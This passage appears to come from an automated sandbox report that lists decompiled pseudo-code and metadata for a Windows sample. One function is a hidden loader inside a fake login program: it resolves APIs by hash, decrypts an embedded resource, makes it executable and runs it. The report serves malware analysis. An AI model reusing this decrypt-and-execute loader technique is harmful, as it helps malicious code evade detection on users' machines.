                                                                      0x00becc39
                                                                      0x00becc3d
                                                                      0x00becc42
                                                                      0x00becc4a

                                                                      APIs
                                                                        • Part of subcall function 00BED59F: __getptd_noexit.LIBCMT ref: 00BED5A0
                                                                      • __lock.LIBCMT ref: 00BECC4D
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00BECC6A
                                                                      • _free.LIBCMT ref: 00BECC7D
                                                                      • InterlockedIncrement.KERNEL32(01201220), ref: 00BECC95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                      • String ID:
                                                                      • API String ID: 2704283638-0
                                                                      • Opcode ID: 0dcabbbe5cc610eef47595a52a7f89b13570938dfc42617c9af1859baed1bc18
                                                                      • Instruction ID: 66a41be862b8f9fea405264ba38939e602f9bf06228b36439bb2499a2b09d01b
                                                                      • Opcode Fuzzy Hash: 0dcabbbe5cc610eef47595a52a7f89b13570938dfc42617c9af1859baed1bc18
                                                                      • Instruction Fuzzy Hash: 0901D232901A51ABD725AB6B980579EBBE0FF44710F294189ED0867391CB306E43CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00BE1B30(intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				char _v45;
                                                                      				short _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v64;
                                                                      				intOrPtr _v68;
                                                                      				char _v71;
                                                                      				char _v75;
                                                                      				char _v79;
                                                                      				char _v80;
                                                                      				char _v92;
                                                                      				char _v167;
                                                                      				char _v168;
                                                                      				signed int _t163;
                                                                      				signed int _t177;
                                                                      				signed int _t178;
                                                                      				void* _t186;
                                                                      				intOrPtr _t189;
                                                                      				void* _t292;
                                                                      				void* _t293;
                                                                      				void* _t294;
                                                                      
                                                                      				_v64 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v45 = 0;
                                                                      				_v80 = 0;
                                                                      				_v79 = 0;
                                                                      				_v75 = 0;
                                                                      				_v71 = 0;
                                                                      				_v168 = 0;
                                                                      				_t163 = E00BE87A0( &_v167, 0, 0x31);
                                                                      				_t294 = _t293 + 0xc;
                                                                      				asm("cvttsd2si eax, [ebp+0x8]");
                                                                      				_v16 = _t163;
                                                                      				asm("cdq");
                                                                      				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
                                                                      				asm("cdq");
                                                                      				_v16 = _v16 / 0x3e8;
                                                                      				_v8 = 4;
                                                                      				while(_v8 >= 0) {
                                                                      					asm("cdq");
                                                                      					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
                                                                      					asm("cdq");
                                                                      					_v16 = _v16 / 0x64;
                                                                      					_v8 = _v8 - 1;
                                                                      				}
                                                                      				_v36 =  *(_t292 + 0xffffffffffffffa4);
                                                                      				asm("cdq");
                                                                      				_v20 = _v36 / 0x64;
                                                                      				asm("cdq");
                                                                      				_v12 = _v36 % 0x64;
                                                                      				asm("cdq");
                                                                      				_v40 = _v12 / 0xa;
                                                                      				_t177 = _v12;
                                                                      				asm("cdq");
                                                                      				_t178 = _t177 / 0xa;
                                                                      				_v44 = _t177 % 0xa;
                                                                      				if(_v12 >= 0x14 || _v20 == 0) {
                                                                      					if(_v12 >= 0x14 || _v20 != 0) {
                                                                      						if(_v12 <= 0x14 || _v20 == 0) {
                                                                      							E00BE1E50(_t178, _v40,  &_v92);
                                                                      							E00BE1E40( &_v32, _v44,  &_v32);
                                                                      							E00BE8140( &_v64,  &_v32);
                                                                      							_t294 = _t294 + 8;
                                                                      						} else {
                                                                      							E00BE1E40(_v20, _v20,  &_v32);
                                                                      							E00BE8140( &_v64, "Hundred ");
                                                                      							E00BE1E50(_v40, _v40,  &_v92);
                                                                      							E00BE8140( &_v64,  &_v92);
                                                                      							E00BE1E40( &_v32, _v44,  &_v32);
                                                                      							E00BE8140( &_v64,  &_v32);
                                                                      							_t294 = _t294 + 0x18;
                                                                      						}
                                                                      					} else {
                                                                      						E00BE1E40( &_v32, _v12,  &_v32);
                                                                      					}
                                                                      				} else {
                                                                      					E00BE1E40(_v20, _v20,  &_v32);
                                                                      					E00BE8140( &_v64, "Hundred ");
                                                                      					E00BE1E40(_v12, _v12,  &_v32);
                                                                      					E00BE8140( &_v64,  &_v32);
                                                                      					_t294 = _t294 + 0x10;
                                                                      				}
                                                                      				_v8 = 4;
                                                                      				while(_v8 >= 0) {
                                                                      					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
                                                                      						asm("cdq");
                                                                      						E00BE1E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
                                                                      						asm("cdq");
                                                                      						E00BE1E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
                                                                      						E00BE8140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
                                                                      						_t294 = _t294 + 8;
                                                                      					} else {
                                                                      						E00BE1E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
                                                                      					}
                                                                      					_v8 = _v8 - 1;
                                                                      				}
                                                                      				_v8 = 0;
                                                                      				while(_v8 < 5) {
                                                                      					_t189 = E00BE82C0(_t292 + _v8 * 0x1e - 0x13c);
                                                                      					_t294 = _t294 + 4;
                                                                      					_v68 = _t189;
                                                                      					if(_v68 != 0) {
                                                                      						E00BE8140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
                                                                      						E00BE8140( &_v168,  &_v80);
                                                                      						_t294 = _t294 + 0x10;
                                                                      					}
                                                                      					_v8 = _v8 + 1;
                                                                      				}
                                                                      				E00BE8140(_a12,  &_v64);
                                                                      				_t186 = E00BE82C0(_a12);
                                                                      				 *((char*)(_a12 + _t186 - 1)) = 0;
                                                                      				return _t186;
                                                                      			}


































                                                                      0x00be1b39
                                                                      0x00be1b3f
                                                                      0x00be1b42
                                                                      0x00be1b45
                                                                      0x00be1b48
                                                                      0x00be1b4b
                                                                      0x00be1b4f
                                                                      0x00be1b52
                                                                      0x00be1b58
                                                                      0x00be1b5b
                                                                      0x00be1b5e
                                                                      0x00be1b61
                                                                      0x00be1b73
                                                                      0x00be1b78
                                                                      0x00be1b7b
                                                                      0x00be1b80
                                                                      0x00be1b86
                                                                      0x00be1b96
                                                                      0x00be1b9d
                                                                      0x00be1ba5
                                                                      0x00be1ba8
                                                                      0x00be1bba
                                                                      0x00be1bc3
                                                                      0x00be1bce
                                                                      0x00be1bd5
                                                                      0x00be1bdd
                                                                      0x00be1bb7
                                                                      0x00be1bb7
                                                                      0x00be1bee
                                                                      0x00be1bf4
                                                                      0x00be1bfc
                                                                      0x00be1c02
                                                                      0x00be1c0a
                                                                      0x00be1c10
                                                                      0x00be1c18
                                                                      0x00be1c1b
                                                                      0x00be1c1e
                                                                      0x00be1c24
                                                                      0x00be1c26
                                                                      0x00be1c2d
                                                                      0x00be1c79
                                                                      0x00be1c97
                                                                      0x00be1d01
                                                                      0x00be1d0e
                                                                      0x00be1d1b
                                                                      0x00be1d20
                                                                      0x00be1c9f
                                                                      0x00be1ca7
                                                                      0x00be1cb5
                                                                      0x00be1cc5
                                                                      0x00be1cd2
                                                                      0x00be1ce2
                                                                      0x00be1cef
                                                                      0x00be1cf4
                                                                      0x00be1cf4
                                                                      0x00be1c81
                                                                      0x00be1c89
                                                                      0x00be1c89
                                                                      0x00be1c35
                                                                      0x00be1c3d
                                                                      0x00be1c4b
                                                                      0x00be1c5b
                                                                      0x00be1c68
                                                                      0x00be1c6d
                                                                      0x00be1c6d
                                                                      0x00be1d23
                                                                      0x00be1d35
                                                                      0x00be1d43
                                                                      0x00be1d63
                                                                      0x00be1d6c
                                                                      0x00be1d7c
                                                                      0x00be1d85
                                                                      0x00be1d9c
                                                                      0x00be1da1
                                                                      0x00be1d45
                                                                      0x00be1d51
                                                                      0x00be1d51
                                                                      0x00be1d32
                                                                      0x00be1d32
                                                                      0x00be1da6
                                                                      0x00be1db8
                                                                      0x00be1dcc
                                                                      0x00be1dd1
                                                                      0x00be1dd4
                                                                      0x00be1ddb
                                                                      0x00be1df2
                                                                      0x00be1e05
                                                                      0x00be1e0a
                                                                      0x00be1e0a
                                                                      0x00be1db5
                                                                      0x00be1db5
                                                                      0x00be1e17
                                                                      0x00be1e23
                                                                      0x00be1e2e
                                                                      0x00be1e36

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _memset
                                                                      • String ID: Hundred $Hundred
                                                                      • API String ID: 2102423945-1478457770
                                                                      • Opcode ID: 83974acbcf6e75925c495d583302e9f9beabcc88f5504bdf396f008d63f4a0d9
                                                                      • Instruction ID: 0a791c8639c680a12c836e8eeb3802daf9430037c8333cd884c7c27bf145b6d9
                                                                      • Opcode Fuzzy Hash: 83974acbcf6e75925c495d583302e9f9beabcc88f5504bdf396f008d63f4a0d9
                                                                      • Instruction Fuzzy Hash: 5FA130B1D00248EBCB04DFE9D881AEDB7F9EF48300F2089A9F515A7251EB759A05CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E00BEF71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                                      				intOrPtr* _v20;
                                                                      				void* _t4;
                                                                      				intOrPtr* _t7;
                                                                      				intOrPtr _t9;
                                                                      
                                                                      				_t15 = __edx;
                                                                      				_t13 = __ebx;
                                                                      				_t4 = E00BF3C1F(0, 0x10000, 0x30000);
                                                                      				if(_t4 != 0) {
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E00BE8B87(__ebx, __edx);
                                                                      					asm("int3");
                                                                      					_t7 =  *_v20;
                                                                      					__eflags =  *_t7 - 0xe06d7363;
                                                                      					if( *_t7 != 0xe06d7363) {
                                                                      						L9:
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      					} else {
                                                                      						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
                                                                      						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
                                                                      							goto L9;
                                                                      						} else {
                                                                      							_t9 =  *((intOrPtr*)(_t7 + 0x14));
                                                                      							__eflags = _t9 - 0x19930520;
                                                                      							if(__eflags == 0) {
                                                                      								L10:
                                                                      								E00BEC6A9(_t13, _t15, 0, __eflags);
                                                                      								asm("int3");
                                                                      								E00BEC080(E00BEF743);
                                                                      								__eflags = 0;
                                                                      								return 0;
                                                                      							} else {
                                                                      								__eflags = _t9 - 0x19930521;
                                                                      								if(__eflags == 0) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									__eflags = _t9 - 0x19930522;
                                                                      									if(__eflags == 0) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										__eflags = _t9 - 0x1994000;
                                                                      										if(__eflags == 0) {
                                                                      											goto L10;
                                                                      										} else {
                                                                      											goto L9;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					return _t4;
                                                                      				}
                                                                      			}







                                                                      0x00bef71c
                                                                      0x00bef71c
                                                                      0x00bef72a
                                                                      0x00bef734
                                                                      0x00bef738
                                                                      0x00bef739
                                                                      0x00bef73a
                                                                      0x00bef73b
                                                                      0x00bef73c
                                                                      0x00bef73d
                                                                      0x00bef742
                                                                      0x00bef749
                                                                      0x00bef74b
                                                                      0x00bef751
                                                                      0x00bef778
                                                                      0x00bef778
                                                                      0x00bef77b
                                                                      0x00bef753
                                                                      0x00bef753
                                                                      0x00bef757
                                                                      0x00000000
                                                                      0x00bef759
                                                                      0x00bef759
                                                                      0x00bef75c
                                                                      0x00bef761
                                                                      0x00bef77e
                                                                      0x00bef77e
                                                                      0x00bef783
                                                                      0x00bef789
                                                                      0x00bef78f
                                                                      0x00bef791
                                                                      0x00bef763
                                                                      0x00bef763
                                                                      0x00bef768
                                                                      0x00000000
                                                                      0x00bef76a
                                                                      0x00bef76a
                                                                      0x00bef76f
                                                                      0x00000000
                                                                      0x00bef771
                                                                      0x00bef771
                                                                      0x00bef776
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bef776
                                                                      0x00bef76f
                                                                      0x00bef768
                                                                      0x00bef761
                                                                      0x00bef757
                                                                      0x00bef736
                                                                      0x00bef737
                                                                      0x00bef737

                                                                      APIs
                                                                      • __controlfp_s.LIBCMT ref: 00BEF72A
                                                                        • Part of subcall function 00BF3C1F: __control87.LIBCMT ref: 00BF3C43
                                                                      • __invoke_watson.LIBCMT ref: 00BEF73D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __control87__controlfp_s__invoke_watson
                                                                      • String ID: csm
                                                                      • API String ID: 1371525046-1018135373
                                                                      • Opcode ID: c31a43782f43f11a0a3de5972e39fa5d561af5f85f38c041d28986b5f2b22f0f
                                                                      • Instruction ID: c7586dc2c4cefe63a9697c8a0b49dd244d3a1f0eed497e228ba7a4d9aca9b0b4
                                                                      • Opcode Fuzzy Hash: c31a43782f43f11a0a3de5972e39fa5d561af5f85f38c041d28986b5f2b22f0f
                                                                      • Instruction Fuzzy Hash: 94F090222102465B8E29A96BA846ABE37CDDB10352B6446E1F9088A5A5DF70CF81C0D6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 55%
                                                                      			E00BE1040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				signed int _v5;
                                                                      				signed int _v12;
                                                                      				struct HINSTANCE__* _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				intOrPtr _v44;
                                                                      				char _v48;
                                                                      				char _v1048;
                                                                      				char _v7712;
                                                                      				void* __ebp;
                                                                      				void* _t130;
                                                                      				void* _t131;
                                                                      				void* _t174;
                                                                      				void* _t175;
                                                                      				void* _t176;
                                                                      				void* _t177;
                                                                      				void* _t178;
                                                                      				void* _t182;
                                                                      
                                                                      				_t182 = __fp0;
                                                                      				_t175 = __esi;
                                                                      				_t174 = __edi;
                                                                      				_t131 = __ecx;
                                                                      				E00BE8770(0x1e1c);
                                                                      				_v16 = GetModuleHandleW(L"Kernel32.dll");
                                                                      				E00BE6B80(_t131);
                                                                      				_v44 = E00BE6A70(_v16, 0xb616c5d9);
                                                                      				_v40 = E00BE6A70(_v16, 0xe0baa99);
                                                                      				_v32 = E00BE6A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
                                                                      				_v24 = E00BE6A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
                                                                      				_v36 = E00BE6A70(_v16, 0x9347c911);
                                                                      				_v28 = _v36(0, L"IEUCIZEO", 0xa);
                                                                      				_v20 = _v40(0, _v28);
                                                                      				E00BE7AE0( &_v7712, _v20, 0x1a05);
                                                                      				_t178 = _t177 + 0xc;
                                                                      				_v12 = 0;
                                                                      				while(_v12 < 0x1a05) {
                                                                      					_v5 =  *((intOrPtr*)(_t176 + _v12 - 0x1e1c));
                                                                      					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                                      					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                      					_v5 = _v5 & 0x000000ff ^ 0x00000032;
                                                                      					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                      					_v5 = _v5 & 0x000000ff ^ 0x00000020;
                                                                      					_v5 =  !(_v5 & 0x000000ff);
                                                                      					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
                                                                      					_v5 = _v5 & 0x000000ff ^ 0x00000080;
                                                                      					_v5 =  ~(_v5 & 0x000000ff);
                                                                      					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                      					_v5 =  ~(_v5 & 0x000000ff);
                                                                      					_v5 =  !(_v5 & 0x000000ff);
                                                                      					_v5 = _v5 & 0x000000ff ^ _v12;
                                                                      					_v5 =  ~(_v5 & 0x000000ff);
                                                                      					_v5 = (_v5 & 0x000000ff) + 0xb;
                                                                      					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
                                                                      					_v5 =  !(_v5 & 0x000000ff);
                                                                      					 *((char*)(_t176 + _v12 - 0x1e1c)) = _v5;
                                                                      					_v12 = _v12 + 1;
                                                                      				}
                                                                      				_v44( &_v7712, 0x1a05, 0x40,  &_v48);
                                                                      				_v32(_v24(0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0, 0));
                                                                      				E00BE21E0( &_v7712, _t174, _t175, __eflags);
                                                                      				while(1) {
                                                                      					E00BE1380(_t174, _t175, __eflags, 8, 9, 0x46, 0xd);
                                                                      					E00BE12B0(0xa, 0xb);
                                                                      					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
                                                                      					E00BE715C(_t130, _t174, _t175, __eflags);
                                                                      					_t178 = _t178 + 4;
                                                                      					__eflags = (_v5 & 0x000000ff) - 0x41;
                                                                      					if((_v5 & 0x000000ff) == 0x41) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = (_v5 & 0x000000ff) - 0x61;
                                                                      					if((_v5 & 0x000000ff) != 0x61) {
                                                                      						__eflags = (_v5 & 0x000000ff) - 0x53;
                                                                      						if((_v5 & 0x000000ff) == 0x53) {
                                                                      							L10:
                                                                      							E00BE3610(_t130, _t174, _t175, _t182);
                                                                      						} else {
                                                                      							__eflags = (_v5 & 0x000000ff) - 0x73;
                                                                      							if((_v5 & 0x000000ff) != 0x73) {
                                                                      								__eflags = (_v5 & 0x000000ff) - 0x1b;
                                                                      								if((_v5 & 0x000000ff) == 0x1b) {
                                                                      									E00BE77B1(0);
                                                                      								}
                                                                      								__eflags = 1;
                                                                      								if(1 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      							} else {
                                                                      								goto L10;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						break;
                                                                      					}
                                                                      					L14:
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				E00BE22F0(_t174, _t175, _t182);
                                                                      				goto L14;
                                                                      			}

























                                                                      0x00be1040
                                                                      0x00be1040
                                                                      0x00be1040
                                                                      0x00be1040
                                                                      0x00be1048
                                                                      0x00be1058
                                                                      0x00be105b
                                                                      0x00be106e
                                                                      0x00be107f
                                                                      0x00be1098
                                                                      0x00be10b1
                                                                      0x00be10c2
                                                                      0x00be10d1
                                                                      0x00be10dd
                                                                      0x00be10f0
                                                                      0x00be10f5
                                                                      0x00be10f8
                                                                      0x00be110a
                                                                      0x00be1121
                                                                      0x00be1134
                                                                      0x00be113e
                                                                      0x00be1148
                                                                      0x00be1152
                                                                      0x00be115c
                                                                      0x00be1165
                                                                      0x00be1177
                                                                      0x00be1183
                                                                      0x00be118c
                                                                      0x00be1196
                                                                      0x00be119f
                                                                      0x00be11a8
                                                                      0x00be11b2
                                                                      0x00be11bb
                                                                      0x00be11c5
                                                                      0x00be11d8
                                                                      0x00be11e1
                                                                      0x00be11ea
                                                                      0x00be1107
                                                                      0x00be1107
                                                                      0x00be1208
                                                                      0x00be122b
                                                                      0x00be122e
                                                                      0x00be1233
                                                                      0x00be123b
                                                                      0x00be1244
                                                                      0x00be1249
                                                                      0x00be124e
                                                                      0x00be1253
                                                                      0x00be125a
                                                                      0x00be125d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1263
                                                                      0x00be1266
                                                                      0x00be1273
                                                                      0x00be1276
                                                                      0x00be1281
                                                                      0x00be1281
                                                                      0x00be1278
                                                                      0x00be127c
                                                                      0x00be127f
                                                                      0x00be128c
                                                                      0x00be128f
                                                                      0x00be1293
                                                                      0x00be1293
                                                                      0x00be129d
                                                                      0x00be129f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be127f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be12a1
                                                                      0x00be12a1
                                                                      0x00be12a6
                                                                      0x00be12a6
                                                                      0x00be1268
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE1052
                                                                        • Part of subcall function 00BE6B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B8C
                                                                        • Part of subcall function 00BE6B80: HeapAlloc.KERNEL32(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B93
                                                                        • Part of subcall function 00BE6B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BCD
                                                                        • Part of subcall function 00BE6B80: HeapAlloc.KERNEL32(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BD4
                                                                      • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE108C
                                                                      • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE10A5
                                                                      • _memmove.LIBCMT ref: 00BE10F0
                                                                      • _wprintf.LIBCMT ref: 00BE124E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Heap$AllocLibraryLoadProcess$HandleModule_memmove_wprintf
                                                                      • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                                                      • API String ID: 2215760113-1224953502
                                                                      • Opcode ID: f954d695283db7dfb245995c0aad2d76b1ecf9e57a90316d0abff58e71bd94d0
                                                                      • Instruction ID: d04631a79cb12dce8a9ce683d465f69e73169425001801cbdb94b3c02d7fc14a
                                                                      • Opcode Fuzzy Hash: f954d695283db7dfb245995c0aad2d76b1ecf9e57a90316d0abff58e71bd94d0
                                                                      • Instruction Fuzzy Hash: 6071AE70D4C2D8BADB01DBFA88917FDBFB09F16302F1484D9E591B6282CA75474ADB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E00BE3610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _v36;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				char _v80;
                                                                      				char _v92;
                                                                      				char _v124;
                                                                      				char _v156;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t60;
                                                                      				void* _t61;
                                                                      				void* _t98;
                                                                      				void* _t99;
                                                                      				void* _t108;
                                                                      				intOrPtr _t111;
                                                                      				void* _t121;
                                                                      				void* _t122;
                                                                      				void* _t123;
                                                                      				void* _t127;
                                                                      				void* _t128;
                                                                      				void* _t129;
                                                                      				void* _t130;
                                                                      				void* _t131;
                                                                      				void* _t139;
                                                                      				void* _t148;
                                                                      
                                                                      				_t148 = __fp0;
                                                                      				_t122 = __esi;
                                                                      				_t121 = __edi;
                                                                      				_t108 = __ebx;
                                                                      				_v68 = 0;
                                                                      				_v67 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v12 = 0;
                                                                      				_v20 = 0;
                                                                      				_v20 = 0;
                                                                      				do {
                                                                      					E00BE1380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
                                                                      					E00BE12B0(7, 5);
                                                                      					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                                      					E00BE715C(_t108, _t121, _t122, 0);
                                                                      					E00BE12B0(0x17, 0xa);
                                                                      					_push("Enter User name : ");
                                                                      					E00BE715C(_t108, _t121, _t122, 0);
                                                                      					E00BE738B("%s", 0xc02ee4);
                                                                      					E00BE12B0(0x17, 0xc);
                                                                      					_push("Password        : ");
                                                                      					E00BE715C(_t108, _t121, _t122, 0);
                                                                      					_t127 = _t123 + 0x14;
                                                                      					E00BE12F0(_t121, _t122,  &_v68);
                                                                      					_v20 = _v20 + 1;
                                                                      					_t143 = _v20 - 3;
                                                                      					if(_v20 == 3) {
                                                                      						E00BE20E0( &_v68, _t121, _t122, _t143, _t148);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push(0xbffb98);
                                                                      						E00BE715C(_t108, _t121, _t122, _t143);
                                                                      						E00BE12B0(0x16, 0xc);
                                                                      						_push("Press ENTER to exit the program...");
                                                                      						E00BE715C(_t108, _t121, _t122, _t143);
                                                                      						_t127 = _t127 + 8;
                                                                      						E00BE77B1(0);
                                                                      					}
                                                                      					_v12 = 0;
                                                                      					_t58 = E00BE6EF1("USER.DAT", "r");
                                                                      					_t128 = _t127 + 8;
                                                                      					 *0xc02f28 = _t58;
                                                                      					while(1) {
                                                                      						_push( &_v156);
                                                                      						_push( &_v124);
                                                                      						_t60 =  *0xc02f28; // 0x0
                                                                      						_t61 = E00BE7021(_t60, "%s %s %s\n",  &_v92);
                                                                      						_t129 = _t128 + 0x14;
                                                                      						if(_t61 == 0xffffffff) {
                                                                      							break;
                                                                      						}
                                                                      						_t98 = E00BE8230(0xc02ee4,  &_v124);
                                                                      						_t128 = _t129 + 8;
                                                                      						if(_t98 == 0) {
                                                                      							_t99 = E00BE8230(0xc02f02,  &_v156);
                                                                      							_t128 = _t128 + 8;
                                                                      							if(_t99 == 0) {
                                                                      								_v12 = _v12 + 1;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t111 =  *0xc02f28; // 0x0
                                                                      					_push(_t111);
                                                                      					E00BE6DB6(_t108, _t121, _t122, __eflags);
                                                                      					_t130 = _t129 + 4;
                                                                      					E00BE20E0(_t111, _t121, _t122, __eflags, _t148);
                                                                      					__eflags = _v12;
                                                                      					if(__eflags == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					break;
                                                                      					L10:
                                                                      					E00BE12B0(0xa, 0xa);
                                                                      					_push(0xbffbf8);
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					_t123 = _t130 + 4;
                                                                      					__eflags = 1;
                                                                      				} while (1 != 0);
                                                                      				E00BE8417(__eflags,  &_v80);
                                                                      				_t131 = _t130 + 4;
